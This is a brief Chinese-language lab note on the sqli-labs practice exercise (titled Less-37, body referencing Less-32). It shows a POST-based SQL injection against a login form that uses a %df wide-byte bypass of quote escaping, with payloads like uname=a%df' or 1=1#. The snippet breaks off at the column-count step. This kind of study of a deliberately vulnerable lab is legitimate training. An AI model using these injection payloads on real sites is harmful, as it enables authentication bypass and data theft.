Sqli-labs-Less-37 (笔记)

Sqli-labs-Less-32 (笔记) 通过界面显示可知需要使用post进行注入,使用burp进行抓包 查找注入点 uname=a’ or 1=1&passwd=admin&submit=Submit 查看提醒被转义 加上%df,报错 进行注释,成功,说明存在注入 uname=a%df’ or 1=1#&passwd=admin&submit=Submit 查看列数 uname=a%df’
相关文章
相关标签/搜索